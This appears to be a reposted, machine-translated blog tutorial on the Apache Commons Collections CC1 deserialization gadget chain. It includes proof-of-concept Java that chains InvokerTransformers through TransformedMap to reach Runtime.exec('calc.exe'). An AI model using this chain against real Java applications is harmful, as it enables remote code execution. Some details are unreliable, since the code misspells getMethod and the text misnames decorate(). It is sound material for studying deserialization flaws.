Common collections1 analysis pre knowledge of Java Security

Java

Common collections1 analysis pre knowledge of Java Security

0x00 Preface

The utilization chain of common collections, also known as CC chain, is an essential part in learning deserialization vulnerabilities. Apache commons collections is a library widely used in Java, including Weblogic, JBoss, WebSphere, Jenkins and other well-known large Java applications.

0x01 pre knowledge

Let's take a look at the POC code found on the Internet

import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.util.HashMap;
import java.util.Map;

public class test {

    public static void main(String[] args) throws Exception {
        //此处构建了一个transformers的数组,在其中构建了任意函数执行的核心代码
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),new InvokerTransformer("getmethod",new Class[] {String.class,Class[].class },new Object[] {"getRuntime",new Class[0] }),new InvokerTransformer("invoke",new Class[] {Object.class,Object[].class },new Object[] {null,new Object[0] }),new InvokerTransformer("exec",new Class[] {String.class },new Object[] {"calc.exe"})
        };

        //将transformers数组存入ChaniedTransformer这个继承类
        Transformer transformerChain = new ChainedTransformer(transformers);

        //创建Map并绑定transformerChina
        Map innerMap = new HashMap();
        innerMap.put("value","value");
        //给予map数据转化链
        Map outerMap = TransformedMap.decorate(innerMap,null,transformerChain);

        //触发漏洞
        Map.Entry onlyElement = (Map.Entry) outerMap.entrySet().iterator().next();
        //outerMap后一串东西,其实就是获取这个map的第一个键值对(value,value);然后转化成Map.Entry形式,这是map的键值对数据格式
        onlyElement.setValue("foobar");
    }
}

Regardless of the specific implementation, let's check the operation results first.

When debugging this chain, some classes that have not been touched will be set. Before debugging, you need to understand the role of these classes for later understanding.

Transformer

Transformer is an interface provided in common collections

ConstantTransformer

Constanttransformer is the implementation class of transformer

Pass the value of iconstant in the construction method, while the other methods obtain the value of iconstant.

InvokerTransformer

Invokertransformer is also the implementation class of transformer,

There are three parameters in the construction method. The ⼀ parameter is the name of the method to be executed, the ⼆ parameter is the parameter type of the parameter list of the function, and the third parameter is the parameter list passed to the function.

It also provides a transform method, which can execute arbitrary code through java reflection mechanism.

ChainedTransformer

Chainedtransformer is also a class that implements the transformer connection,

You can see that the transform method traverses the passed in value by passing in the trasnformer [] array, and calls the transform method of the array object.

Map

Transform to execute commands needs to be bound to the map. The abstract class abstractmapdecorator is a class provided by Apache commons collections. There are many implementation classes, such as lazymap, transformedmap, etc. these classes have a modify () method to bind the above transformer implementation class to the map. When performing some operations on the map, The tranform () method of the transformer implementation class will be triggered automatically. Different map types have different trigger rules.

TransformedMap

Map outerMap = TransformedMap.decorate(innerMap,transformerChain);

The transformer implementation class is bound to the key and value of the map respectively. When the key or value of the map is modified, the transform () method of the corresponding transformer implementation class will be called.

We can bind the chained transformer to a transformed map. When the key or value of the map changes, the chained transformer will be triggered automatically.

Reference articles

https://www.cnblogs.com/litlife/p/12571787.html#transformer
https://xz.aliyun.com/t/7031#toc-8

0x02 incomplete continued

The debugging of CC chain is much more troublesome than urldns, and a lot of knowledge is required during debugging. Continue in mark.

The content of this article comes from the network collection of netizens. It is used as a learning reference. The copyright belongs to the original author.
THE END
分享
二维码
< <上一篇
下一篇>>